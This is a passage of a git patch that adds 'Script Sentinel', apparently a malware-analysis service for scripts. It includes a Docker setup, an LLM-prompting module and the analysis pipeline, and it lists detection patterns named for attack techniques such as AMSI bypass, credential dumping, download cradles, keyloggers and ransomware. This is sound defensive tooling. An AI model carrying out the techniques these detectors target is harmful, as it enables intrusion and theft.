mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-023-webassembly.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-024-dom-clobbering.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-025-string-fromcharcode.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-026-anti-debugging.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-027-boolean-algebra-obfuscation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-028-control-flow-flattening.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-029-suspicious-long-strings.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/loader.py create mode 100644 docker/script-sentinel/sentinel/patterns/models.py create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-001-invoke-expression.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-002-base64-encoded.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-003-download-cradle.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-004-registry-persistence.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-005-wmi-execution.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-006-process-injection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-007-credential-dumping.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-008-scheduled-task.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-009-powershell-remoting.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-010-amsi-bypass.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-011-logging-evasion.yaml create mode 100644 
docker/script-sentinel/sentinel/patterns/powershell/ps-012-reflective-loading.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-013-com-object-abuse.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-014-hidden-window.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-015-clipboard-access.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-016-network-share-enum.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-017-service-manipulation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-018-token-manipulation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-019-keylogger.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-020-ransomware.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-021-bitsadmin-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-022-mshta-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-023-regsvr32-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-024-rundll32-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-025-process-monitoring.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-026-registry-monitoring.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-027-network-scanning.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-028-certutil-download.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-030-reflective-dll-injection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-031-process-hollowing.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-032-embedded-binary-execution.yaml create 
# Script Sentinel Docker Image for XSIAM
# Malware analysis for PowerShell, Bash, and JavaScript scripts

# Use official Demisto Python 3 base image (Alpine-based)
# Check latest version at: https://hub.docker.com/r/demisto/python3/tags
FROM demisto/python3:3.11.9.109876

# Metadata
LABEL maintainer="aperetz@paloaltonetworks.com"
LABEL description="Script Sentinel - Malware analysis for PowerShell, Bash, and JavaScript"
LABEL version="1.0.0"
LABEL com.demisto.image.type="python"
LABEL com.demisto.image.category="malware-analysis"

# Set working directory
WORKDIR /app

# Create non-root user (if not already in base image).
# Both commands are best-effort: a failure (e.g. the user or group already
# exists) is ignored so the build can continue on base images that ship one.
RUN addgroup -g 1000 -S sentinel 2>/dev/null || true && \
    adduser -u 1000 -S sentinel -G sentinel 2>/dev/null || true

# Copy requirements first for better layer caching
# Note: If using poetry, the build script will auto-generate requirements.txt
COPY requirements.txt .

# Install Python dependencies
RUN pip install --no-cache-dir --upgrade pip && \
    pip install --no-cache-dir -r requirements.txt

# Copy application code
COPY sentinel/ ./sentinel/
COPY xsiam_wrapper.py ./
COPY docker-entrypoint.sh ./

# Make entrypoint executable
RUN chmod +x docker-entrypoint.sh

# Switch to non-root user
USER sentinel

# Put /app on the module search path. The ":+" form appends the previous value
# only when one exists, so an unset PYTHONPATH does not leave a trailing ":"
# (an empty entry, which Python treats as the current directory).
ENV PYTHONPATH=/app${PYTHONPATH:+:${PYTHONPATH}}

# Health check (optional): the image is healthy when both packages import
HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \
    CMD python -c "import sentinel; import xsiam_wrapper" || exit 1

# Entrypoint (absolute path so it still resolves when the caller overrides
# the working directory with `docker run -w ...`)
ENTRYPOINT ["/app/docker-entrypoint.sh"]

# Default command (can be overridden)
CMD ["--help"]
#!/bin/sh
# Docker entrypoint for Script Sentinel XSIAM integration.
#
# Supports two modes, selected by the first argument:
#   xsiam-wrapper [args...]  -> run /app/xsiam_wrapper.py with the remaining args
#   anything else            -> forward every argument to `python3 -m sentinel.main`
#                               (covers `analyze`, `--help`, `-h`, and no args)
#
# Written for POSIX sh rather than bash: the image is Alpine-based and the
# script uses no bash-only features, so it must not depend on /bin/bash.

set -e

if [ "${1:-}" = "xsiam-wrapper" ]; then
    # XSIAM mode: drop the mode selector and hand the rest to the wrapper.
    shift
    exec python3 /app/xsiam_wrapper.py "$@"
fi

# CLI mode (default): sentinel.main parses the arguments itself.
exec python3 -m sentinel.main "$@"
JavaScript scripts" +authors = ["Script Sentinel Team "] + +[tool.poetry.dependencies] +python = "^3.11" +tree-sitter = "0.21.3" +google-generativeai = "0.8.3" +google-ai-generativelanguage = "0.6.10" +PyYAML = "6.0.2" +python-dotenv = "1.0.1" +rich = "13.9.4" +google-auth = "2.36.0" +google-api-core = "2.23.0" + +[build-system] +requires = ["poetry-core"] +build-backend = "poetry.core.masonry.api" diff --git a/docker/script-sentinel/sentinel/__init__.py b/docker/script-sentinel/sentinel/__init__.py new file mode 100644 index 0000000000000..e69de29bb2d1d diff --git a/docker/script-sentinel/sentinel/adk_agent.py b/docker/script-sentinel/sentinel/adk_agent.py new file mode 100644 index 0000000000000..65694bf9e2faa --- /dev/null +++ b/docker/script-sentinel/sentinel/adk_agent.py @@ -0,0 +1,441 @@ +# sentinel/adk_agent.py + +""" +Google ADK integration for LLM-powered semantic analysis. + +This module integrates Google's Agent Development Kit (ADK) with Gemini 2.5 Pro +to provide semantic analysis of scripts for security threat detection. 
+""" + +import logging +import asyncio +from typing import Optional, Any +from dataclasses import dataclass + +from google.adk import Agent, Runner +from google.adk.sessions import InMemorySessionService +from google.genai import types + +from .models import Finding +from .sanitizer import sanitize_script + +logger = logging.getLogger(__name__) + +# Timeout for LLM API calls (35 seconds per NFR-2) +LLM_TIMEOUT_SECONDS = 35 + +# Available Gemini models +GEMINI_MODELS = { + 'flash': 'gemini-2.0-flash-exp', # Fast, cost-effective (recommended for production) + 'pro': 'gemini-2.5-pro', # Deeper analysis, higher quality + 'flash-thinking': 'gemini-2.0-flash-thinking-exp' # Experimental with reasoning +} + +# Default model +DEFAULT_MODEL = 'flash' + + +@dataclass +class ADKAnalysisResult: + """Result from ADK semantic analysis.""" + findings: list[Finding] + metadata: dict[str, Any] + + +def _check_adk_available() -> tuple[bool, Optional[str]]: + """ + Check if ADK and Gemini are available. + + Automatically attempts to configure authentication if not already set up. + + Returns: + Tuple of (is_available, error_message). 
+ """ + try: + # Try to import required modules + import google.adk + import google.genai + import os + + # Auto-configure environment if not set + if not os.getenv('GOOGLE_CLOUD_PROJECT'): + # Try to get from gcloud config + try: + import subprocess + result = subprocess.run( + ['gcloud', 'config', 'get-value', 'project'], + capture_output=True, + text=True, + timeout=5 + ) + if result.returncode == 0 and result.stdout.strip(): + os.environ['GOOGLE_CLOUD_PROJECT'] = result.stdout.strip() + logger.info(f"Auto-configured GOOGLE_CLOUD_PROJECT from gcloud") + except Exception: + pass + + if not os.getenv('GOOGLE_CLOUD_LOCATION'): + # Default to us-central1 + os.environ['GOOGLE_CLOUD_LOCATION'] = 'us-central1' + logger.info("Auto-configured GOOGLE_CLOUD_LOCATION to us-central1") + + # Final check + if not os.getenv('GOOGLE_CLOUD_PROJECT'): + return False, "GOOGLE_CLOUD_PROJECT not configured. Set via: gcloud config set project YOUR_PROJECT_ID" + + # Check for authentication (multiple possible locations) + credentials_paths = [ + os.path.expanduser('~/.config/gcloud/application_default_credentials.json'), + os.getenv('GOOGLE_APPLICATION_CREDENTIALS', ''), + ] + + has_credentials = any(os.path.exists(p) for p in credentials_paths if p) + + if not has_credentials: + return False, "Google Cloud credentials not found. Run: gcloud auth application-default login" + + return True, None + + except ImportError as e: + return False, f"Required module not available: {str(e)}. Install with: pip install google-adk google-genai" + except Exception as e: + return False, f"ADK availability check failed: {str(e)}" + + +def _create_analysis_prompt( + language: str, + script_content: str, + heuristic_findings: list[Finding] +) -> str: + """ + Create the analysis prompt for the LLM. + + Args: + language: Script language (powershell, bash, javascript). + script_content: The sanitized script content. + heuristic_findings: Findings from heuristic analysis. 
+ + Returns: + Formatted prompt string. + """ + # Build heuristic findings summary + heuristic_summary = "" + if heuristic_findings: + heuristic_summary = "\n\n## Heuristic Findings\n\n" + heuristic_summary += "The following patterns were detected by heuristic analysis:\n\n" + for i, finding in enumerate(heuristic_findings, 1): + heuristic_summary += f"{i}. **{finding.pattern_id}** (Severity: {finding.severity}, Confidence: {finding.confidence:.2f})\n" + heuristic_summary += f" - {finding.description}\n" + if finding.mitre_technique: + heuristic_summary += f" - MITRE: {finding.mitre_technique}\n" + + prompt = f"""You are a cybersecurity expert analyzing a {language} script for potential security threats. + +## Task + +Perform semantic analysis to identify security threats, malicious patterns, or suspicious behaviors that may not be caught by simple pattern matching. Focus on: + +1. **Intent Analysis**: What is the script trying to accomplish? +2. **Behavioral Patterns**: Does it exhibit malicious behaviors (data exfiltration, persistence, privilege escalation)? +3. **Context Understanding**: Are seemingly benign commands used in a malicious context? +4. **Obfuscation Detection**: Is the code intentionally obscured to hide malicious intent? +5. **MITRE ATT&CK Mapping**: Which tactics and techniques does it employ? + +{heuristic_summary} + +## Script Content + +```{language} +{script_content} +``` + +## Output Format + +Provide your analysis as a JSON array of findings. 
Each finding must include: + +- `pattern_id`: A unique identifier (e.g., "semantic-data-exfil-001") +- `severity`: One of "High", "Medium", "Low" +- `confidence`: A float between 0.0 and 1.0 +- `description`: Clear description of the threat +- `mitre_technique`: MITRE ATT&CK technique ID (e.g., "T1059.001") or null +- `category`: One of "execution", "persistence", "privilege_escalation", "defense_evasion", "credential_access", "discovery", "lateral_movement", "collection", "exfiltration", "command_and_control", "impact" + +Example: +```json +[ + {{ + "pattern_id": "semantic-credential-theft-001", + "severity": "High", + "confidence": 0.92, + "description": "Script attempts to access browser credential stores and send data to external server", + "mitre_technique": "T1555.003", + "category": "credential_access" + }} +] +``` + +**Important**: +- Only report findings with confidence >= 0.6 +- Be specific about WHY something is suspicious +- Consider the context - not all powerful commands are malicious +- If no threats are found, return an empty array: [] +""" + + return prompt + + +def _parse_llm_response(response_text: str) -> tuple[list[Finding], Optional[str]]: + """ + Parse LLM response into Finding objects. + + Args: + response_text: Raw response from LLM. + + Returns: + Tuple of (findings_list, error_message). 
+ """ + import json + import re + + try: + # Extract JSON from response (handle markdown code blocks) + json_match = re.search(r'```(?:json)?\s*(\[.*?\])\s*```', response_text, re.DOTALL) + if json_match: + json_str = json_match.group(1) + else: + # Try to find JSON array directly + json_match = re.search(r'\[.*?\]', response_text, re.DOTALL) + if json_match: + json_str = json_match.group(0) + else: + return [], "No JSON array found in LLM response" + + # Parse JSON + findings_data = json.loads(json_str) + + if not isinstance(findings_data, list): + return [], "LLM response is not a JSON array" + + # Convert to Finding objects + findings = [] + for item in findings_data: + try: + # Convert confidence string to float if needed + confidence = item.get('confidence', 0.0) + if isinstance(confidence, str): + confidence = float(confidence) + + finding = Finding( + pattern_id=item.get('pattern_id', 'semantic-unknown'), + severity=item.get('severity', 'Medium'), + confidence=confidence, + description=item.get('description', 'No description provided'), + mitre_technique=item.get('mitre_technique'), + category=item.get('category', 'unknown') + ) + findings.append(finding) + except (KeyError, ValueError, TypeError) as e: + logger.warning(f"Failed to parse finding: {e}") + continue + + return findings, None + + except json.JSONDecodeError as e: + return [], f"Failed to parse JSON: {str(e)}" + except Exception as e: + return [], f"Failed to parse LLM response: {str(e)}" + + +async def _run_adk_analysis( + language: str, + sanitized_content: str, + heuristic_findings: list[Finding], + model: str = DEFAULT_MODEL +) -> tuple[Optional[ADKAnalysisResult], Optional[str]]: + """ + Run ADK analysis with Gemini. + + Args: + language: Script language. + sanitized_content: Sanitized script content. + heuristic_findings: Findings from heuristic analysis. + model: Gemini model to use ('flash', 'pro', or 'flash-thinking'). + + Returns: + Tuple of (ADKAnalysisResult, error_message). 
+ """ + try: + # Create the analysis prompt + prompt = _create_analysis_prompt(language, sanitized_content, heuristic_findings) + + # Get project and location from environment + import os + + project = os.getenv('GOOGLE_CLOUD_PROJECT') + location = os.getenv('GOOGLE_CLOUD_LOCATION', 'us-central1') + + # Configure environment for Vertex AI (per official ADK docs) + os.environ['GOOGLE_GENAI_USE_VERTEXAI'] = 'true' + os.environ['GOOGLE_CLOUD_PROJECT'] = project + os.environ['GOOGLE_CLOUD_LOCATION'] = location + + # Get model name from configuration + model_name = GEMINI_MODELS.get(model, GEMINI_MODELS[DEFAULT_MODEL]) + + logger.info(f"Configured Vertex AI: project={project}, location={location}, model={model_name}") + + # Create ADK agent (ADK will auto-detect Vertex AI from env vars) + agent = Agent( + name="security_analyzer", + model=model_name, + instruction="""You are a cybersecurity expert specializing in script analysis. + Analyze scripts for security threats and provide detailed findings in JSON format. 
async def analyze_with_adk(
    script_content: str,
    language: str,
    ast: Any,
    heuristic_findings: list[Finding],
    model: str = DEFAULT_MODEL
) -> tuple[Optional[list[Finding]], Optional[str]]:
    """
    Run LLM-powered semantic analysis of a script through Google ADK / Gemini.

    Pipeline:
      1. Verify that ADK is usable (packages, project, credentials).
      2. Sanitize the script before it leaves the process.
      3. Run the Gemini analysis under a hard timeout.
      4. Hand back the findings, or an error so the caller can degrade
         gracefully to heuristics-only mode.

    Args:
        script_content: Original (unsanitized) script content.
        language: Script language (powershell, bash, javascript).
        ast: Parsed AST; accepted for future use and not read here.
        heuristic_findings: Findings from heuristic analysis, passed on to the
            LLM as context.
        model: Gemini model key ('flash', 'pro', or 'flash-thinking').
            Defaults to 'flash' for speed and cost-effectiveness.

    Returns:
        Tuple of (findings_list, error_message).
        On success: (findings, None)
        On failure: (None, error_message) - triggers fallback to heuristics-only

    Examples:
        >>> findings, error = await analyze_with_adk(script, "powershell", ast, [])
        >>> findings, error = await analyze_with_adk(script, "powershell", ast, [], model='pro')
        >>> if findings:
        ...     print(f"Found {len(findings)} semantic threats")
        >>> else:
        ...     print(f"ADK unavailable: {error}")
    """
    # 1. Availability gate
    adk_ready, reason = _check_adk_available()
    if not adk_ready:
        logger.warning(f"ADK not available: {reason}")
        return None, reason

    # 2. Redact sensitive data before transmission
    logger.info("Sanitizing script content for LLM transmission")
    sanitized_content, stats = sanitize_script(script_content)
    logger.info(f"Sanitization complete: {stats.total_redactions} redactions")

    # 3. Time-boxed LLM call
    try:
        logger.info(f"Starting ADK analysis with {model} model (timeout: {LLM_TIMEOUT_SECONDS}s)")
        analysis_task = _run_adk_analysis(language, sanitized_content, heuristic_findings, model)
        outcome, failure = await asyncio.wait_for(analysis_task, timeout=LLM_TIMEOUT_SECONDS)

        if failure:
            logger.error(f"ADK analysis failed: {failure}")
            return None, failure

        if not outcome:
            return None, "ADK analysis returned no result"

        semantic_findings = outcome.findings
        logger.info(f"ADK analysis complete: {len(semantic_findings)} findings")
        return semantic_findings, None

    except asyncio.TimeoutError:
        timeout_msg = f"ADK analysis timed out after {LLM_TIMEOUT_SECONDS} seconds"
        logger.error(timeout_msg)
        return None, timeout_msg
    except Exception as e:
        failure_msg = f"ADK analysis failed: {str(e)}"
        # Rate limiting is an expected condition: warn without a stack trace.
        rate_limited = '429' in failure_msg or 'RESOURCE_EXHAUSTED' in failure_msg
        if not rate_limited:
            # Anything else is unexpected, so keep the traceback.
            logger.error(failure_msg, exc_info=True)
        else:
            logger.warning(failure_msg)
        return None, failure_msg
+ +This module coordinates the analysis pipeline, integrating parsing, +heuristic pattern matching, and optional LLM-based semantic analysis +to produce comprehensive security assessments.
+ """ + self.heuristic_engine = HeuristicEngine() + self.ioc_extractor = IOCExtractor() + self.script_extractor = ScriptExtractor() + self.patterns_loaded = False + + # Initialize MITRE mapper with data directory + data_dir = Path(__file__).parent / 'data' + try: + self.mitre_mapper = MITREMapper(data_dir) + logger.info("MITRE ATT&CK mapper initialized") + except (FileNotFoundError, ValueError) as e: + logger.warning(f"MITRE mapper initialization failed: {e}") + self.mitre_mapper = None + + if patterns_dir: + self.load_patterns(patterns_dir) + + logger.info("Script analyzer initialized") + + def load_patterns(self, patterns_dir: str | Path) -> tuple[int, list[str]]: + """ + Loads patterns from directory into the heuristic engine. + + Args: + patterns_dir: Path to directory containing pattern YAML files. + + Returns: + Tuple of (number_of_patterns_loaded, list_of_errors). + """ + count, errors = self.heuristic_engine.load_patterns(patterns_dir) + self.patterns_loaded = count > 0 + + if self.patterns_loaded: + logger.info(f"Loaded {count} patterns for analysis") + else: + logger.error("Failed to load any patterns") + + return count, errors + + def analyze( + self, + script_content: str, + language: str, + include_llm: bool = False, + paranoia_level: int = 1, + file_type: Optional[str] = None, + llm_model: str = 'flash' + ) -> tuple[Optional[AnalysisResult], Optional[str]]: + """ + Analyzes a script and returns comprehensive security assessment. + + Args: + script_content: The script content to analyze. + language: Script language ('powershell', 'bash', 'javascript') or container type ('html', 'xml', 'sct'). + include_llm: Whether to include LLM semantic analysis. + paranoia_level: Analysis sensitivity level (1=Balanced, 2=Aggressive, 3=Maximum). + file_type: Optional file type hint for embedded script extraction ('html', 'xml', 'sct'). + llm_model: Gemini model to use for LLM analysis ('flash', 'pro', or 'flash-thinking'). 
+ Default is 'flash' for speed and cost-effectiveness. + + Returns: + Tuple of (AnalysisResult, error_message). + On success: (AnalysisResult, None) + On failure: (None, error_message) + + Examples: + >>> analyzer = ScriptAnalyzer('sentinel/patterns') + >>> # Use default Flash model + >>> result, error = analyzer.analyze(script_content, 'powershell', include_llm=True) + >>> # Use Pro model for deeper analysis + >>> result, error = analyzer.analyze(script_content, 'powershell', include_llm=True, llm_model='pro') + >>> if result: + ... print(f"Found {len(result.findings)} issues") + """ + # Start timing for overall analysis + analysis_start_time = time.time() + + try: + # Validate inputs + if not script_content or not script_content.strip(): + return None, "Empty script content provided" + + if not language: + return None, "Language not specified" + + # Preprocess script content: remove null bytes and other control characters + # that can break pattern matching while preserving legitimate content + original_size = len(script_content) + script_content = script_content.replace('\x00', '') # Remove null bytes + if len(script_content) != original_size: + logger.info(f"Removed {original_size - len(script_content)} null bytes from script") + + # Normalize language + language = language.lower() + valid_languages = {'powershell', 'bash', 'javascript'} + container_types = {'html', 'xml', 'sct'} + + # Check if this is a container file that needs script extraction + if language in container_types or file_type in container_types: + return self._analyze_embedded( + script_content, + file_type or language, + include_llm, + paranoia_level, + llm_model + ) + + if language not in valid_languages: + return None, f"Unsupported language: {language}. 
Must be one of {valid_languages} or {container_types}" + + # Check patterns are loaded + if not self.patterns_loaded: + logger.warning("No patterns loaded - analysis will have limited effectiveness") + + # Step 1: Parse script into AST + logger.info(f"Parsing {language} script ({len(script_content)} bytes)") + ast, parse_error = parse(script_content, language) + + # Enable fallback mode for unparseable scripts + fallback_mode = False + if parse_error or not ast: + logger.warning(f"Parser failed: {parse_error or 'Empty AST'}") + logger.info("Enabling fallback mode: regex-only pattern matching") + fallback_mode = True + # Create minimal AST for fallback mode + ast = {'type': 'fallback', 'children': []} + + # Step 2: Run heuristic pattern matching + logger.info("Running heuristic pattern matching") + heuristic_start_time = time.time() + heuristic_findings = [] + + if self.patterns_loaded: + heuristic_findings = self.heuristic_engine.match_patterns( + ast, + language, + script_content, + paranoia_level + ) + logger.info(f"Heuristic analysis found {len(heuristic_findings)} findings (paranoia level: {paranoia_level})") + + heuristic_duration = time.time() - heuristic_start_time + + # Step 2.5: Run obfuscation detection + logger.info("Running obfuscation detection") + obfuscation_start_time = time.time() + obfuscation_findings = detect_obfuscation(script_content, language, ast) + logger.info(f"Obfuscation detection found {len(obfuscation_findings)} findings") + obfuscation_duration = time.time() - obfuscation_start_time + obfuscation_detected = len(obfuscation_findings) > 0 + + # Combine heuristic and obfuscation findings + heuristic_findings.extend(obfuscation_findings) + + # Step 2.75: Extract IOCs from script content + logger.info("Extracting Indicators of Compromise (IOCs)") + ioc_start_time = time.time() + iocs = self.ioc_extractor.extract(script_content, language, heuristic_findings) + ioc_duration = time.time() - ioc_start_time + + # Count total IOCs + total_iocs = 
sum(len(ioc_list) for ioc_list in iocs.values()) + logger.info(f"IOC extraction found {total_iocs} IOCs across {len(iocs)} types") + + # Step 2.8: Map findings to MITRE ATT&CK techniques + mitre_techniques = {} + mitre_duration = 0.0 + + if self.mitre_mapper: + logger.info("Mapping findings to MITRE ATT&CK techniques") + mitre_start_time = time.time() + mitre_techniques = self.mitre_mapper.map_findings(heuristic_findings) + mitre_duration = time.time() - mitre_start_time + + total_techniques = len(mitre_techniques) + logger.info(f"MITRE mapping found {total_techniques} unique techniques") + else: + logger.warning("MITRE mapper not available - skipping technique mapping") + + # Step 3: Run LLM semantic analysis (if enabled) + llm_findings = [] + llm_available = False + llm_error = None + llm_duration = 0.0 + + if include_llm: + logger.info("Running LLM semantic analysis with ADK") + llm_start_time = time.time() + try: + # Run ADK analysis asynchronously + llm_findings_result, adk_error = asyncio.run( + analyze_with_adk( + script_content=script_content, + language=language, + ast=ast, + heuristic_findings=heuristic_findings, + model=llm_model + ) + ) + + if llm_findings_result is not None: + llm_findings = llm_findings_result + llm_available = True + logger.info(f"LLM analysis complete: {len(llm_findings)} findings") + else: + llm_error = adk_error + logger.warning(f"LLM analysis unavailable: {adk_error}") + logger.info("Falling back to heuristics-only mode") + + except Exception as e: + llm_error = str(e) + logger.error(f"LLM analysis failed: {e}", exc_info=True) + logger.info("Falling back to heuristics-only mode") + + llm_duration = time.time() - llm_start_time + + # Step 4: Generate overall verdict and confidence using verdict module + logger.info("Calculating final verdict and confidence score") + verdict_start_time = time.time() + + # Combine all findings for verdict calculation + all_findings = heuristic_findings + llm_findings + + verdict, confidence = 
calculate_verdict( + findings=all_findings, + llm_available=llm_available, + obfuscation_detected=obfuscation_detected, + paranoia_level=paranoia_level + ) + + verdict_duration = time.time() - verdict_start_time + + # Calculate total analysis time + analysis_duration = time.time() - analysis_start_time + + # Calculate script metrics + script_lines = script_content.count('\n') + 1 + script_bytes = len(script_content.encode('utf-8')) + + # Get severity distribution for metadata + from .verdict import get_severity_distribution + severity_dist = get_severity_distribution(all_findings) + + # Create analysis result with comprehensive metadata + result = AnalysisResult( + verdict=verdict, + confidence_score=confidence, + findings=all_findings, + heuristic_findings=heuristic_findings, + llm_findings=llm_findings, + iocs=iocs, + mitre_techniques=mitre_techniques, + metadata={ + # Script information + 'script_language': language, + 'script_lines': script_lines, + 'script_bytes': script_bytes, + 'script_size': len(script_content), # Kept for backward compatibility + + # Analysis timing + 'analysis_time_seconds': round(analysis_duration, 3), + 'heuristic_duration': round(heuristic_duration, 3), + 'obfuscation_duration': round(obfuscation_duration, 3), + 'ioc_duration': round(ioc_duration, 3), + 'mitre_duration': round(mitre_duration, 3), + 'llm_duration': round(llm_duration, 3), + 'verdict_duration': round(verdict_duration, 3), + + # Finding counts + 'total_findings': len(all_findings), + 'heuristic_findings_count': len(heuristic_findings), + 'obfuscation_findings_count': len(obfuscation_findings), + 'llm_findings_count': len(llm_findings), + + # IOC counts + 'total_iocs': total_iocs, + 'ioc_types_found': len(iocs), + 'iocs_by_type': {ioc_type: len(ioc_list) for ioc_type, ioc_list in iocs.items()}, + + # MITRE ATT&CK counts + 'total_mitre_techniques': len(mitre_techniques), + 'mitre_techniques_by_tactic': self._group_techniques_by_tactic(mitre_techniques), + + # Pattern 
matching info + 'patterns_checked': self.heuristic_engine.registry.get_enabled_count(), + 'pattern_matches': severity_dist, + + # Analysis mode + 'paranoia_level': paranoia_level, + 'obfuscation_detected': obfuscation_detected, + 'llm_available': llm_available, + 'llm_error': llm_error, + 'parser_fallback_mode': fallback_mode, + 'parse_error': parse_error if fallback_mode else None, + 'llm_fallback_mode': include_llm and not llm_available + } + ) + + logger.info(f"Analysis complete: {verdict.value} (confidence: {confidence:.2f}, " + f"time: {analysis_duration:.2f}s)") + return result, None + + except Exception as e: + error_msg = f"Analysis failed: {str(e)}" + logger.error(error_msg, exc_info=True) + return None, error_msg + + def _analyze_embedded( + self, + content: str, + file_type: str, + include_llm: bool, + paranoia_level: int, + llm_model: str = 'flash' + ) -> tuple[Optional[AnalysisResult], Optional[str]]: + """ + Analyzes embedded scripts in HTML, XML, or SCT files. + + Args: + content: Container file content. + file_type: Type of container ('html', 'xml', 'sct'). + include_llm: Whether to include LLM semantic analysis. + paranoia_level: Analysis sensitivity level. + + Returns: + Tuple of (AnalysisResult, error_message). 
+ """ + logger.info(f"Analyzing embedded scripts in {file_type} file") + + # Extract scripts from container + extracted_scripts = self.script_extractor.extract(content, file_type) + + if not extracted_scripts: + return None, f"No scripts found in {file_type} file" + + logger.info(f"Extracted {len(extracted_scripts)} script(s) from {file_type} file") + + # Analyze each extracted script + all_findings = [] + all_heuristic_findings = [] + all_llm_findings = [] + all_iocs = {} + all_mitre_techniques = {} + + highest_verdict = Verdict.BENIGN + total_confidence = 0.0 + analysis_errors = [] + + for i, script in enumerate(extracted_scripts, 1): + logger.info(f"Analyzing script {i}/{len(extracted_scripts)}: " + f"{script.language} (lines {script.line_start}-{script.line_end})") + + # Analyze the extracted script + result, error = self.analyze( + script.content, + script.language, + include_llm=include_llm, + paranoia_level=paranoia_level, + llm_model=llm_model + ) + + if error: + logger.warning(f"Failed to analyze script {i}: {error}") + analysis_errors.append(f"Script {i} ({script.context}): {error}") + continue + + if not result: + continue + + # Adjust finding line numbers to match original file + for finding in result.findings: + if hasattr(finding, 'line_number') and finding.line_number: + finding.line_number += script.line_start - 1 + # Add context about which embedded script this came from + finding.description = f"[{script.context}] {finding.description}" + + # Aggregate results + all_findings.extend(result.findings) + all_heuristic_findings.extend(result.heuristic_findings) + all_llm_findings.extend(result.llm_findings) + + # Merge IOCs + for ioc_type, ioc_list in result.iocs.items(): + if ioc_type not in all_iocs: + all_iocs[ioc_type] = [] + all_iocs[ioc_type].extend(ioc_list) + + # Merge MITRE techniques + all_mitre_techniques.update(result.mitre_techniques) + + # Track highest severity verdict + if result.verdict.value > highest_verdict.value: + highest_verdict 
= result.verdict + + total_confidence += result.confidence_score + + # If all scripts failed to analyze, return error + if not all_findings and analysis_errors: + return None, f"Failed to analyze embedded scripts: {'; '.join(analysis_errors)}" + + # Calculate aggregate confidence (average of all scripts) + num_analyzed = len(extracted_scripts) - len(analysis_errors) + aggregate_confidence = total_confidence / num_analyzed if num_analyzed > 0 else 0.0 + + # Use the highest verdict found across all scripts + final_verdict = highest_verdict + + # Get severity distribution + from .verdict import get_severity_distribution + severity_dist = get_severity_distribution(all_findings) + + # Create aggregate result + result = AnalysisResult( + verdict=final_verdict, + confidence_score=aggregate_confidence, + findings=all_findings, + heuristic_findings=all_heuristic_findings, + llm_findings=all_llm_findings, + iocs=all_iocs, + mitre_techniques=all_mitre_techniques, + metadata={ + 'file_type': file_type, + 'embedded_scripts_count': len(extracted_scripts), + 'scripts_analyzed': num_analyzed, + 'scripts_failed': len(analysis_errors), + 'analysis_errors': analysis_errors, + 'total_findings': len(all_findings), + 'heuristic_findings_count': len(all_heuristic_findings), + 'llm_findings_count': len(all_llm_findings), + 'total_iocs': sum(len(ioc_list) for ioc_list in all_iocs.values()), + 'total_mitre_techniques': len(all_mitre_techniques), + 'pattern_matches': severity_dist, + 'paranoia_level': paranoia_level, + 'embedded_analysis': True + } + ) + + logger.info(f"Embedded script analysis complete: {final_verdict.value} " + f"(confidence: {aggregate_confidence:.2f}, " + f"{num_analyzed}/{len(extracted_scripts)} scripts analyzed)") + + return result, None + + def _group_techniques_by_tactic(self, mitre_techniques: dict) -> Dict[str, int]: + """ + Groups MITRE techniques by tactic for metadata. + + Args: + mitre_techniques: Dictionary of MITRETechnique objects. 
